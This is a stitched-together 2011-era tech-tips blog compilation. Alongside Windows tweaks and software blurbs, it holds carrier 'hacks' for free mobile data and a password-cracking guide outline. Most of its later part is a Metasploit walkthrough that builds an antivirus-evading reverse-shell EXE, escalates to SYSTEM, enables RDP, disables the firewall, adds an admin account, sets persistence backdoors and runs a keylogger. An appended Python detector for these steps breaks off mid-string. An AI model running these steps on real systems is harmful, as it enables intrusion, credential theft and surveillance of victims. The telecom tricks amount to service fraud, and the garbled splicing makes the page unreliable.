Monday, March 14, 2011

A modern PC with Vista Home Edition takes about one and a half minutes to boot. An older machine with XP is about the same. That’s 30 seconds for the PC itself (the BIOS) to boot up, plus a minute for the Windows operating system to boot.

Sometimes, you need to reboot Windows (e.g. when installing new software), but there is no need to restart BIOS, too. However, the default is to reboot both. (That’s called doing a “cold boot,” rather than a “warm boot.”) There’s a trick that works on both XP and Vista to get it to do a warm boot instead, thus saving you 30 seconds per cycle.

The trick is to hold down the SHIFT key when invoking the restart.

Windows Vista: Select Start, then hover over the right arrow that is to the right of the padlock icon until the pop-up menu appears that contains “restart” as one of its choices. Hold down the SHIFT key while clicking on the “restart” choice.

Windows XP: Select Start. Select “Shut Down…”. Change the drop-down combo box under “What do you want the computer to do?” to “Restart”. Hold down the SHIFT key while clicking on the “OK” button.


Have you ever been annoyed by the start-up and shutdown jingle of your Windows XP or Vista PC? If so, here is the solution: you can use any favourite voice clip, piece of music or dialogue as your PC’s start-up and shutdown sound.

It’s a simple 4 step process.

1. Choose the tracks you want to play as the start-up and shutdown jingles.

2. Rename these files to “Windows XP Startup.WAV” and “Windows XP Shutdown.WAV” respectively.

3. Go to “C:\WINDOWS\MEDIA”, where you will find the existing files “Windows XP Startup.WAV” and “Windows XP Shutdown.WAV”. Move them to some other location so that you can revert to the original sounds later; if you do not need that, you can skip this step.

4. Copy or move the files you chose and renamed into “C:\WINDOWS\MEDIA”. That’s it: you can now enjoy the new start-up and shutdown sounds.

Limitations:

* The file must be in .WAV format.
* The file should not be large; keep it within 1 MB, otherwise your start-up will take a bit longer.

If the file you want to use as your start-up or shutdown sound is not in .WAV format, you can easily convert it using Jet Audio 7 or any other converter.

If you’ve ever waited too long for your files to download from a slow connection, or been cut off mid-way through a download, or just can’t keep track of your ever-growing downloads, FlashGet can help you. FlashGet is specifically designed to address two of the biggest problems when downloading files: speed and management of downloaded files.
Download FlashGet here



Features


- Optimised use of system resources. FlashGet uses minimal system resources and will not interfere with your normal work or study.

- Calls anti-virus automatically. FlashGet can call your anti-virus automatically to clean viruses, spyware and adware after a download finishes.

- 100% clean and free. No adware or spyware. Easy to install and use.

- Increased download speed and stability. FlashGet can increase download speed 6-10 times. It uses the MHT (Multi-server Hyper-threading Transportation) technique and optimization algorithms.

- Supports HTTP, FTP, BT and various other protocols. FlashGet supports HTTP, FTP, BT, MMS, RTSP and other protocols. Switching between protocols is seamless and needs no manual intervention. The One Touch technique optimizes BT downloads and can automatically download the target files once the seed information is obtained, so no further action is needed.

- Powerful file management. It supports unlimited categories, each assigned its own download directory. The management features include drag and drop, adding descriptions, search, rename, etc.

Surfing the net is not as secure as the average internet user may think. Your identity and what you are doing can be monitored easily. This is especially true for those on wireless networks, those who browse the internet from their work computer and those who browse dodgy (red flag) websites. The solution is to use an anonymizer when you surf the net.
Anonymous surfing redirects your web traffic through secure servers, hiding your online identity. Identity thieves, aggressive marketers, hackers and online snoops are prevented from accessing your personal information and viewing your Internet activity.

The Anonymizer (includes a Free Tool to browse any website anonymously)

Surf Secret

Proxy 7

Virtual Browser

Hide IP

Site Tunnel

Surf Anonymous

From reading some of the information on these sites, you may be shocked to realize how little privacy you actually have, even with a firewall. If you have concerns about identity theft or monitoring of your online browsing without your permission, I suggest you take a look at these sites and decide for yourself.

Security is becoming more and more important as new viruses and worms (Lovesan Worm, Blaster Worm, etc.) keep being unleashed. That's why it's important to make sure your system is protected. Put your system to the test. Here are some great websites that will test your security:


Hackerwhacker.com

GRC

Testmyfirewall

Auditmypc

  • An excellent piece of software to recover data from your SIM card.

    Sim Card Data Recovery Software recovers text SMS messages accidentally deleted from your mobile phone's SIM card. Data Doctor Sim Card Recovery Software is a read-only, non-destructive utility that restores all lost messages. The utility retrieves all deleted contact numbers (phone numbers), unreadable messages and corrupt phone book directories.

    It provides a full backup of your cell phone's erased SIM memory. For recovery, you need a Phoenix type USB SIM card reader or a PC/SC Standards based SIM card reader, and a PC running a Microsoft Windows operating system. The SIM card reader scans the SIM card deeply and detects all the recoverable information. A print option provides the facility to print a report of all recovered data, such as your text messages and contact numbers. The software provides full details about the SIM card, like its provider and ICC-ID (identification number). It provides restoration of text files lost or corrupted due to virus infection in your mobile phone. Recovery is not possible if the SIM card is locked (due to an unauthorized PIN code). The software ensures recovery even if your inbox, outbox, draft and sent items messages and phone numbers are invisible or unreadable. It fetches the recently erased call list.


    Important: Please remember that you need a USB SIM card reader (any PC/SC Standards or Phoenix Standards based reader) to use our software to recover data from a SIM card. If you are not able to find a compatible SIM card reader, please feel free to contact us to get the information of manufacturers who can make it available to you in a very short time.

    Download Link http://www.4shared.com/file/74852469/945dd17/SIMCardDataRecoverySoftwarev3015.html

  • Today I am going to show how to hack BSNL 3G and browse unlimited internet at high speed, up to 120 Kbps. I am not sure whether this hack is still working or not; members of other forums are posting that it is working fine for them.




  • Before you start learning how to hack you need to have a BSNL 2G SIM and, ultimately, a 3G-capable mobile phone.

    Just follow the instructions:
    1. Recharge your 2G SIM with Rs 1 to convert it to a 3G SIM and use it for the free hours
    2. Check the balance by dialing *123#; the message will show that your GPRS free usage is ZERO MB
    3. Now recharge again with Rs 1 to convert it back to a 2G SIM
    4. Now recharge with Rs 274 for unlimited GPRS usage on the 2G SIM
    5. Now recharge again with Rs 1 to convert it to a 3G SIM
    6. That's it. You have hacked your BSNL 3G for unlimited browsing. Check the GPRS free usage by dialing *123#; it will show 1250000 MB free usage.

    Hope it will work for you! Try it and share your thoughts with us!



  • I really don't know whether this trick is working or not, but I found in some forums that members are posting that this trick is still working fine! If you want to browse the internet free of cost using Airtel Live, all you need is the free mobile browser Opera 4.2 or 5 Beta 2 and some GPRS settings in Airtel Live.

    If your Airtel Live is not active, call customer care, receive the Airtel Live settings and configure them according to their guidance.

    Now download the following Opera mobile browser and install it in to your mobile.

    Now you have activated your Airtel Live and the Opera Mini browser.

    Now follow the instructions to configure your Airtel Live settings to surf freely.

    For s60 users:

    Create a new access point and set
    Access Point as airtelgprs.com
    Proxy address= 80.239.242.253
    Port= 80 (Remember it's 80, not 8080)

    Just try it on your mobile and share your feedback with us.

  • We usually set a password on our memory card for privacy and security, but the common mistake everyone makes at least once in their lifetime is forgetting the password. If you set a password on your mobile memory card, then you should not forget it. If you do, then the only option is to format your memory card with the help of a card reader, and eventually lose all the data stored on it. There is a way to break the security wall. If you are a Symbian device lover then there is no need to worry about the password. You can crack it in a few minutes.



    In this tutorial I am going to teach you how to reset your memory card password in easy steps. Before we start you need to have X-plore (an application used to explore your system files and folders, even the hidden folders on your device).



    Step 1: Install X-Plore on your mobile. If you want to download X-Plore, search around the internet; you can download a free trial.

    Step 2: Open the X-plore app and press 0 (zero), then check that you have marked "show the system files".

    Step 3: Once you have done that, go to the following path: C:/Sys/Data/Mmcstore

    Step 4: Once you reach it, press "3" under options to view it in the hex viewer.

    Step 5: Look at the third column; you will be able to see a line like ! TMSD02G (c??"?x???6?2?6?2?6). Check the characters between the "?" marks; that is your password, i.e. 62626.



    Note: If you have not set a password, then you will not be able to gain access to C:/Sys/Data

    THE OFFICIAL SOCIAL ENGINEERING BOOK

    We would like to congratulate Social-Engineer.Org on the official release of their book, Social Engineering: The Art of Human Hacking. The book has proven to be a huge success and is being marked by the community as the official social engineering book.

    We are excited to see Social-Engineer.org lead the way in evolving social engineering’s reputation from the world of scammers and thugs to a science that can be utilized to help improve information security for all of us.

    We strongly encourage everyone to increase their awareness of malicious social engineering and the dangers it presents, and this book and the official social engineering framework are the perfect vehicles to start.


    This method of installation is the simplest available. The assumption is that the whole hard drive is going to be used for BackTrack.
    1. Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface.
    2. Double click the “install.sh” script on the desktop, or run the command “ubiquity” in console.
    3. Select your geographical location and click “forward”. Same for the keyboard layout.
    4. The next screen allows you to configure the partitioning layout. The assumption is that we are deleting the whole drive and installing BackTrack on it.
    5. Accept the installation summary and click “Install”. Allow the installation to run and complete. Restart when done.
    6. Log into BackTrack with the default username and password root / toor. Change the root password.
    7. Fix the framebuffer splash by typing “fix-splash” (or “fix-splash800” if you wish an 800×600 framebuffer), then reboot.


    The goal is to unify all of the good information found in various bits and pieces into 1 large document. This document is for people who want to learn the how and why of password cracking. There is a lot of information being presented and you should READ IT ALL BEFORE you attempt doing anything documented here. I do my best to provide step by step instructions along with the reasons for doing it this way. Other times I will point to a particular website where you find the information. In those cases someone else has done what I am attempting and did a good or great job and I didn’t want to steal their hard work. These instructions have several excerpts from a combination of posts from pureh@te, granger53, irongeek, PrairieFire, and stasik. I would also like to thank each of them and others for the help they have provided me on the BackTrack forum.

    I had to compress the document so I could attach it. The document as it stands now is 127K. Please let me know if what I have is wrong, or if there is a better way to do something, or if I am missing something. I am planning on making enhancements as people make me aware of them.

    Here is the table of contents
    Code:
    1 LM vs. NTLM
    2 Syskey
    3 Cracking Windows Passwords
       3.1 Extracting the hashes from the Windows SAM
          3.1.1 Using BackTrack Tools
             3.1.1.1 Using bkhive and samdump v1.1.1 (BT2 and BT3)
             3.1.1.2 Using samdump2 v2.0.1 (BT4)
             3.1.1.3 Cached Credentials
          3.1.2 Using Windows Tools
             3.1.2.1 Using fgdump
             3.1.2.2 Using gsecdump
             3.1.2.3 Using pwdump7
             3.1.2.4 Cached Credentials
       3.2 Extracting the hashes from the Windows SAM remotely
          3.2.1 Using BackTrack Tools
             3.2.1.1 ettercap
          3.2.2 Using Windows Tools
             3.2.2.1 Using fgdump
       3.3 Cracking Windows Passwords
          3.3.1 Using BackTrack Tools
             3.3.1.1 John the Ripper BT3 and BT4
                3.3.1.1.1 Cracking the LM hash
                3.3.1.1.2 Cracking the NTLM hash
                3.3.1.1.3 Cracking the NTLM using the cracked LM hash
                3.3.1.1.4 Cracking cached credentials
             3.3.1.2 John the Ripper - current
                3.3.1.2.1 Get and Compile
                3.3.1.2.2 Cracking the LM hash
                3.3.1.2.3 Cracking the LM hash using known letter(s) in known location(s) (knownforce)
                3.3.1.2.4 Cracking the NTLM hash
                3.3.1.2.5 Cracking the NTLM hash using the cracked LM hash (dumbforce)
                3.3.1.2.6 Cracking cached credentials
             3.3.1.3 Using MDCrack
                3.3.1.3.1 Cracking the LM hash
                3.3.1.3.2 Cracking the NTLM hash
                3.3.1.3.3 Cracking the NTLM hash using the cracked LM hash
             3.3.1.4 Using Ophcrack
                3.3.1.4.1 Cracking the LM hash
                3.3.1.4.2 Cracking the NTLM hash
                3.3.1.4.3 Cracking the NTLM hash using the cracked LM hash
          3.3.2 Using Windows Tools
             3.3.2.1 John the Ripper
                3.3.2.1.1 Cracking the LM hash
                3.3.2.1.2 Cracking the NTLM hash
                3.3.2.1.3 Cracking the NTLM hash using the cracked LM hash
                3.3.2.1.4 Cracking cached credentials
             3.3.2.2 Using MDCrack
                3.3.2.2.1 Cracking the LM hash
                3.3.2.2.2 Cracking the NTLM hash
                3.3.2.2.3 Cracking the NTLM hash using the cracked LM hash
             3.3.2.3 Using Ophcrack
                3.3.2.3.1 Cracking the LM hash
                3.3.2.3.2 Cracking the NTLM hash
                3.3.2.3.3 Cracking the NTLM hash using the cracked LM hash
             3.3.2.4 Using Cain and Abel
          3.3.3 Using a Live CD
             3.3.3.1 Ophcrack
    4 Changing Windows Passwords
       4.1 Changing Local User Passwords
          4.1.1 Using BackTrack Tools
             4.1.1.1 chntpw
          4.1.2 Using a Live CD
             4.1.2.1 chntpw
             4.1.2.2 System Rescue CD
       4.2 Changing Active Directory Passwords
    5 plain-text.info
    6 Cracking Novell NetWare Passwords
    7 Cracking Linux/Unix Passwords
    8 Cracking networking equipment passwords
       8.1 Using BackTrack tools
          8.1.1 Using Hydra
          8.1.2 Using Xhydra
          8.1.3 Using Medusa
          8.1.4 Using John the Ripper to crack a Cisco hash
       8.2 Using Windows tools
          8.2.1 Using Brutus
    9 Cracking Applications
       9.1 Cracking Oracle 11g (sha1)
       9.2 Cracking Oracle passwords over the wire
       9.3 Cracking Office passwords
       9.4 Cracking tar passwords
       9.5 Cracking zip passwords
       9.6 Cracking pdf passwords
    10 Wordlists aka Dictionary attack
       10.1 Using John the Ripper to generate a wordlist
       10.2 Configuring John the Ripper to use a wordlist
       10.3 Using crunch to generate a wordlist
       10.4 Generate a wordlist from a textfile or website
       10.5 Using premade wordlists
       10.6 Other wordlist generators
       10.7 Manipulating your wordlist
    11 Rainbow Tables
       11.1 What are they?
       11.2 Generating your own
          11.2.1 rcrack - obsolete but works
          11.2.2 rcracki
          11.2.3 rcracki - boinc client
          11.2.4 Generating a rainbow table
       11.3 WEP cracking
       11.4 WPA-PSK
          11.4.1 airolib
          11.4.2 pyrit
    12 Distributed Password cracking
       12.1 john
       12.2 medussa (not a typo this is not medusa)
    13 using a GPU
       13.1 cuda - nvidia
       13.2 stream - ati
    Thanks,

    P.S. Thank you everyone for your feedback. Keep it coming.

    Changes from version 0.1
    * Added a section on plain-text.info
    * Added a section on using john the ripper with a custom character list
    * Added Xploitz’s and pureh@te’s wordlists

    Changes from version 0.2 - 200 downloads
    * Added sections on using ophcrack
    * Added sections on Cain and Abel under windows
    * Fixed a typo
    * New html format

    Changes from version 0.3 - 410 downloads
    * Moved some content to where it should have been
    * Added a section on crunch
    * Fixed typos
    * Fixed a whole lot of html issues
    * Slightly rearranged things to flow better

    Changes from version 0.4 - 877 downloads
    * Added a section on cached credentials
    * Expanded the Novell section
    * Fixed typos
    * Fixed a couple of html errors
    * Moved some things around
    * New utility to dump passwords

    Changes from version 0.5 - 1573 downloads
    * added wpa pw-inspector command
    * added a wordlist manipulation section
    * added usage of fgdump
    * added rcracki section
    * added a sample hash.txt to play with
    * john can be used for input to aircrack-ng
    * moved a few things around for a better flow

    Changes from version 0.6 - 422 downloads
    * added a section on generating a wordlist from a website
    * added head, tail, and sed commands to wordlist manipulation
    * added a section on xhydra (pointing to Pureh@te's video)
    * added a section on gsecdump
    * added a section on medusa
    * added a section on cisco
    * expanded the crunch section
    * moved everything around in an effort to make things easier to find
    * the dumbforce and knownforce are not finished

    Changes from version 0.7 - 4596 downloads
    * Fixed john --incremental=All --stdout | aircrack-ng -b 00:11:22:33:44:55 -w --test.cap
    missing a - Thanks to roblad for pointing it out

    Changes from version 0.8 - 302 + 1226 (old forums + new)
    * updated the guide to support BT4-Pre-Final
    * switched from transitional html to strict html
    * added a section on cracking office passwords
    * added a section on cracking rar passwords
    * added a section on cracking zip passwords
    * added a section on cracking pdf passwords
    * added instructions for remote password dumping for fgdump
    * point users to john the ripper wiki for dumbforce and knownforce usage
    * convert text urls to links
    * updated links
    * update versions of software (wine and rcrack)
    * fixed several spelling mistakes

    Changes from version 0.9

    * updated the guide to support BT4 Final
    * fixed links to pureh@te's videos
    * added instructions to update flash so you can watch videos clearly
    * updated the john the ripper section to current versions
    * added instructions for using rainbow tables for WPA cracking
    * added two new leetifying scripts
    * added a small cupp discussion
    * added a section on pyrit
    * added a section on distributed password cracking using john and medussa
    * added a section on cuda and stream
    * fixed typo in hash.txt


    MOD EDIT: Download link for the guide:
    http://tools.question-defense.com/Cr...ords_Guide.pdf


    This is always a huge topic and it seems simple to many of us but the fact of the matter is we have a lot of "new" people so we need to be clear about this sort of thing. (Note all commands should be run as root or with sudo)

    1. To start networking in Backtrack 4 final issue the following command.

    /etc/init.d/networking start

    This will attempt to start all the interfaces in the /etc/network/interfaces file.

    root@bt:~# cat /etc/network/interfaces
    auto lo
    iface lo inet loopback

    auto eth0
    iface eth0 inet dhcp

    auto eth1
    iface eth1 inet dhcp

    auto eth2
    iface eth2 inet dhcp

    auto ath0
    iface ath0 inet dhcp

    auto wlan0
    iface wlan0 inet dhcp

    If you don't have or don't want some of these interfaces then simply remove them from this file and they will not start.

    If you need to set a static IP just set the variables in the /etc/network/interfaces file

    auto eth0
    iface eth0 inet static
    address 192.168.0.100
    netmask 255.255.255.0
    network 192.168.0.0
    broadcast 192.168.0.255
    gateway 192.168.0.1

    You will also need to make sure you set a nameserver in /etc/resolv.conf

    root@bt:~# cat /etc/resolv.conf
    nameserver 192.168.0.1

    So for example if all you have is eth0 and wlan0 on your system and you want them both to get an address via DHCP then remove everything else from the file with the exception of the lo interface. Here is an example.

    root@bt:~# cat /etc/network/interfaces
    auto lo
    iface lo inet loopback

    auto eth0
    iface eth0 inet dhcp

    auto wlan0
    iface wlan0 inet dhcp

    Now if you are lazy and want all this to start at boot you can simply issue this command as root

    update-rc.d networking defaults

    This will create all the proper sym-links

    What about ssh?

    So while I am on the subject I may as well go over ssh. In order to use ssh on backtrack 4 final you need to generate the keys first.

    sshd-generate

    after that you can start ssh like this:

    /etc/init.d/ssh start

    or you can add it to the boot sequence like this:

    update-rc.d ssh defaults

    Well that's enough to get up and running. I hope this was somewhat helpful to anyone just getting started with backtrack.
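The interfaces file shown in the post has a simple line format (auto lines, iface stanzas, then one option per line). As an added example, not from the original post, the following Python parses that format and checks a static stanza's addressing for consistency before networking is started; the sample files are constructed, with the GOOD one mirroring the post's static example.

```python
"""Added example (not from the original post): parse an /etc/network/interfaces
file of the kind shown above and report inconsistencies before handing it to
'/etc/init.d/networking start'.  Sample files are constructed inline."""
import ipaddress

REQUIRED_STATIC = ("address", "netmask")


def parse_interfaces(text):
    """Return (auto, stanzas).

    auto    - set of interface names taken from 'auto' lines
    stanzas - dict name -> {"family": ..., "method": ..., "options": {...}}"""
    auto, stanzas, current = set(), {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        words = line.split()
        if words[0] == "auto":
            auto.update(words[1:])
            current = None
        elif words[0] == "iface":
            if len(words) < 4:
                raise ValueError("malformed iface line: %r" % raw)
            current = words[1]
            stanzas[current] = {"family": words[2], "method": words[3], "options": {}}
        elif current is not None:
            stanzas[current]["options"][words[0]] = " ".join(words[1:])
        else:
            raise ValueError("option before any iface stanza: %r" % raw)
    return auto, stanzas


def check_interfaces(text):
    """Return a list of human-readable problems; empty means the file is consistent."""
    auto, stanzas = parse_interfaces(text)
    problems = ["%s: listed in 'auto' but has no iface stanza" % n
                for n in sorted(auto - set(stanzas))]
    for name, st in stanzas.items():
        if st["method"] != "static":
            continue                      # dhcp/loopback need no addressing checks
        opts = st["options"]
        missing = [k for k in REQUIRED_STATIC if k not in opts]
        if missing:
            problems.append("%s: static stanza missing %s" % (name, ", ".join(missing)))
            continue
        # ipaddress accepts the 'address/netmask' form used by the file
        net = ipaddress.ip_network("%s/%s" % (opts["address"], opts["netmask"]), strict=False)
        for key in ("gateway", "broadcast"):
            if key in opts and ipaddress.ip_address(opts[key]) not in net:
                problems.append("%s: %s %s is outside %s" % (name, key, opts[key], net))
        if "network" in opts and ipaddress.ip_address(opts["network"]) != net.network_address:
            problems.append("%s: network %s does not match %s"
                            % (name, opts["network"], net.network_address))
    return problems


# Constructed samples: GOOD mirrors the post's static example; BAD has an
# 'auto' interface without a stanza, a gateway in the wrong subnet and a
# static stanza without a netmask.
GOOD = """\
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.0.100
netmask 255.255.255.0
network 192.168.0.0
broadcast 192.168.0.255
gateway 192.168.0.1

auto wlan0
iface wlan0 inet dhcp
"""

BAD = """\
auto lo
iface lo inet loopback

auto eth0 eth1
iface eth0 inet static
address 192.168.0.100
netmask 255.255.255.0
gateway 192.168.1.1   # typo: wrong third octet

auto wlan0
iface wlan0 inet static
address 10.0.0.5
"""

if __name__ == "__main__":
    for label, text in (("GOOD", GOOD), ("BAD", BAD)):
        print(label, check_interfaces(text) or "ok")
```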



    Pentest on BT4 R1

    GUIDE EXPLANATION:
    Text in {} = Titles
    # In front of text = Info
    Text in [] = Your Input

    # Here are some examples on [] from the guide beneath:

    # set LHOST [IP ADRESS INT.] = set LHOST 192.168.1.15

    # rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"

    # search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg

    # So when you input anything where there is [], remember to remove the []

    -------------------------------------

    {Shell 1} (Creating Exploit)

    Code:
    cd /pentest/exploits/framework3/
    
    svn up
    # To update framework3
    
    clear
    
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - How many time it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe
    # If you get encoder error find another EXE or try to encode it less time

    # Copy payload to target


    -------------------------------------

    {Shell 2} (Using Exploit)

    Code:
    cd /pentest/exploits/framework3/
    
    clear
    
    ./msfconsole
    
    use exploit/multi/handler
    
    set PAYLOAD windows/meterpreter/reverse_tcp
    
    set LHOST [IP ADRESS INT.]
    
    set LPORT [PORT] (if used in msfpayload in Shell 1)
    
    show options
    
    exploit
    ----------
    # Now we wait for connection, so start the payload on victim computer
    ----------

    Code:
    use priv
    
    ps
    # Look for PID on explorer.exe
    
    migrate [PID on explorer]
    
    getsystem
    
    sysinfo
    # If "Arch = x64" = NO HASHDUMP it won't work
    # Now we are in the system

    -------------------------------------

    {Prepare for RDP}

    Code:
    shell
    # Connect to CMD
    
    reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
    # Allows incoming terminal service connections
    
    reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
    # Disables blocking incoming Terminal service connections
    
    Netsh firewall set opmode enable
    # Enable Firewall on Victim
    
    Netsh firewall set opmode disable
    # Disable Firewall on Victim
    {USER:} (Still in shell)

    Code:
    net user [USERNAME] [PASSWORD] 
    # Change password for the user
    
    # Or create you own user
    
    net user [USERNAME] [PASSWORD] /add
    
    net localgroup [GROUP] [USERNAME] /add 
    # In [GROUP] you could use "administrators" and [USERNAME] is the user you just created
    
    net accounts /maxpwage:[days] | unlimited
    # Examples: net accounts /maxpwage:6
    # or: net accounts /maxpwage:unlimited
    # CTRL + Z then Y to exit shell without it freezing the system

    -------------------------------------

    {Shell 3} (RDP to compromised system)

    # No need for ":" and [PORT] if local

    # Remember to be in "root@bt:~#"
    Code:
    rdesktop [IP]:[port] -u "[USERNAME]"
    -------------------------------------

    {Setting up backdoors for future use} (when in meterpreter console)

    Code:
    run metsvc (set backdoor for next time you want in)
    
    (OR THIS)
    
    run persistence -r [YOUR IP ADRESS INT./EXT.] -p [YOUR PORT] -A -X -i 300
    # 300 tells it to send request for connection every 300 sec. "run persistence -h" for more info

    ***UP- AND DOWNSIDES USING THIS***

    METSVC:
    VERY BAD: All 3 files it uses get flagged by Norton Internet Security 2011 as a trojan; maybe other AVs will do this too!
    BAD: If the IP changes you have to know the IP to connect back to the victim
    GOOD: Easy to use
    GOOD: It doesn't request YOUR IP and port!

    PERSISTENCE:
    BAD: It requests YOUR IP and port!
    BAD: Can be more "difficult" to use
    GOOD: Flexible
    GOOD: Auto Connect
    ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! It's only when you run NPE (Norton Power Eraser) that it is detected as bad and removed, and that's a tool you must download!

    -------------------------------------

    {GET BACK INTO SYSTEM} (using metsvc in a new terminal)

    Code:
    cd /pentest/exploits/framework3/
    
    svn up
    
    clear
    
    ./msfconsole
    
    use exploit/multi/handler
    
    set PAYLOAD windows/metsvc_bind_tcp
    
    set LPORT 31337 (Must be this port of what i know)
    
    set RHOST [VICTIM IP ADRESS]
    
    show options (see if your setup is correct)
    
    exploit
    ------------------------------------

    {GET BACK INTO SYSTEM} (using persistence in a new terminal)

    Code:
    cd /pentest/exploits/framework3/
    
    svn up
    
    clear
    
    ./msfconsole
    
    use exploit/multi/handler
    
    set PAYLOAD windows/meterpreter/reverse_tcp
    
    set LHOST [IP ADRESS INT.]
    
    set LPORT [PORT]
    # The port set in persistence backdoor
    
    show options
    
    exploit
    ----------
    # Now we wait for connection, it will reconnect to your computer within 300 sec
    ----------

    getuid
    # If = "NT AUTHORITY\SYSTEM" do this else go to "use priv":

    ps
    # Find PID on explorer.exe

    steal_token [NUMBER - PID on explorer]
    # From what I know it grants you the same rights as the user running that process


    use priv

    getsystem


    ------------------------------------

    {Search} (in meterpreter console)

    Code:
    search -f *.jpg
    # Finding all JPG files on the system
    
    search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg
    # Finding all JPG files in a specific folder
    
    search -f test.txt
    # Find a specific file on the whole system
    ------------------------------------

    {Uploading and Downloading} (How I use it)

    # Use "ls", "pwd" and "cd" to navigate around - see below under commands

    Explanation:
    Create a txt file on your BT4 desktop and write anything in it, or nothing, and save it with the name "test.txt". Then in the terminal, in the meterpreter console (after you're connected to the victim), navigate to the desktop of the user currently logged in.
    Use "pwd", without quotes, to check that the path is correct; if it is, type the following:


    {Upload}

    Code:
    upload /root/test.txt test.txt
    
    # and if you are uploading a file with a space in its name:
    
    upload "/root/test 2.txt" "test 2.txt"
    # Or if you're not in the path where you want to upload a file, and want it uploaded to another folder

    upload "/root/test 2.txt" "DRIVE:\\FOLDER\\FOLDER\\test 2.txt"
    # Example: upload "/root/test 2.txt" "C:\\test\\test1\\test 2.txt"


    {Download}

    Explanation:
    Now we are going to download the file we just uploaded, "test.txt". Navigate to the folder if you're not already in it, using the "cd", "pwd" and "ls" commands.

    Then type:


    Code:
    download test.txt /root/test.txt
    
    # And if you are downloading a file with a space in its name
    
    download "test 2.txt" "/root/test 2.txt"
    
    # Or if you're not in the path where you want to download a file from, but know the exact path and name by using search
    
    download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
    # Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"
    ------------------------------------

    {Commands} (meterpreter console)


    help
    # USE THIS!!! That's mostly how I got this knowledge, and then I googled the commands to get more info on them

    screenshot
    # No need to say what it does - remember you must have used "use priv" in meterpreter first

    cd [DRIVE:\\FOLDER\\FOLDER]
    # You get it - Change directory

    pwd
    # Show what directory you're in

    ls
    # List Current Directory

    upload

    # See above

    download

    # See above

    search
    # See above and Meterpreter Search This can be used in diff. consoles!

    keyscan_start
    # Key Sniffer - Start

    keyscan_dump
    # Key Sniffer - dump keys while running

    keyscan_stop
    # Key Sniffer - Stop

    ------------------------------------

    Few words from me:

    First I will say, USE THIS AT YOUR OWN RISK! Do not blame me for anything. DO NOT misuse this information; only use this in a test setup!

    And I will point out for other beginners, I started using metasploit 2 days ago, so do yourself a favour and put some heart into it. Do your legwork before asking; I just gave you a complete detailed guide from start to finish, on a silver platter.

    As always, if you have any questions, google it first and then google it some more, and THEN ask for directions, not the solution!

    Please give some feedback
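The "Prepare for RDP" and "USER" sections of the guide above change the Terminal Server registry values, the firewall state and local accounts, and each of those is a process launch that command-line auditing records. As an added example from the defender's side, not part of the original post, the following Python scores constructed records in a simplified `time|host|user|command_line` rendering of Windows Security event 4688 (the record format and sample hosts are assumptions) against exactly those commands and clusters the hits per host.

```python
"""Added example (not from the original post): flag the host-side footprint of
the guide's 'Prepare for RDP' and 'USER' steps from process-creation records.
Input format is a constructed, simplified rendering of Windows Security event
4688 with command-line auditing enabled: time|host|user|command_line."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Each rule names one step from the guide: a regex over the command line and a weight.
RULES = [
    ("rdp_enabled_via_registry",
     re.compile(r"reg\s+add\s+.*Terminal\s+Server.*fDenyTSConnections.*/d\s+0x?0\b", re.I), 3),
    ("ts_connections_allowed",
     re.compile(r"reg\s+add\s+.*Terminal\s+Server.*AllowTSConnections.*/d\s+0x?1\b", re.I), 2),
    ("firewall_disabled",
     re.compile(r"netsh\s+firewall\s+set\s+opmode\s+disable", re.I), 3),
    ("local_user_created",
     re.compile(r"net\s+user\s+\S+(?:\s+\S+)?\s+/add\b", re.I), 2),
    ("added_to_administrators",
     re.compile(r"net\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I), 3),
    ("password_expiry_disabled",
     re.compile(r"net\s+accounts\s+/maxpwage:unlimited\b", re.I), 1),
]

HIGH_SCORE = 5  # two of the heavier steps inside one window is already 'high'


def parse_record(line):
    """Split 'time|host|user|command_line'; returns None for malformed lines."""
    parts = line.strip().split("|", 3)
    if len(parts) != 4:
        return None
    try:
        when = datetime.strptime(parts[0], "%Y-%m-%d %H:%M:%S")
    except ValueError:
        return None
    return {"time": when, "host": parts[1], "user": parts[2], "cmd": parts[3]}


def match_rules(cmd):
    """Names of all rules whose pattern matches the command line."""
    return [name for name, pat, _ in RULES if pat.search(cmd)]


def analyze(lines, window_minutes=10):
    """Return {host: finding} for every host with at least one rule hit.

    For each host the densest cluster of hits within `window_minutes` is
    scored by summing the weights of the distinct rules it contains; a score
    of HIGH_SCORE or more is marked 'high'."""
    window = timedelta(minutes=window_minutes)
    weights = {name: w for name, _, w in RULES}
    hits = defaultdict(list)
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue                      # skip malformed input rather than crash
        for name in match_rules(rec["cmd"]):
            hits[rec["host"]].append((rec["time"], name, rec["user"]))

    findings = {}
    for host, events in hits.items():
        events.sort()
        best = None
        for i, (start, _, _) in enumerate(events):
            cluster = [e for e in events[i:] if e[0] - start <= window]
            names = sorted({e[1] for e in cluster})
            score = sum(weights[n] for n in names)
            if best is None or score > best["score"]:
                best = {"score": score, "rules": names,
                        "users": sorted({e[2] for e in cluster}),
                        "start": start.isoformat(sep=" "),
                        "end": max(e[0] for e in cluster).isoformat(sep=" ")}
        best["severity"] = "high" if best["score"] >= HIGH_SCORE else "low"
        findings[host] = best
    return findings


# Constructed sample: WS01 shows the guide's full sequence; WS02 is a helpdesk
# password reset (no /add); WS03 is a read-only registry query; the last line is junk.
SAMPLE_LOG = """\
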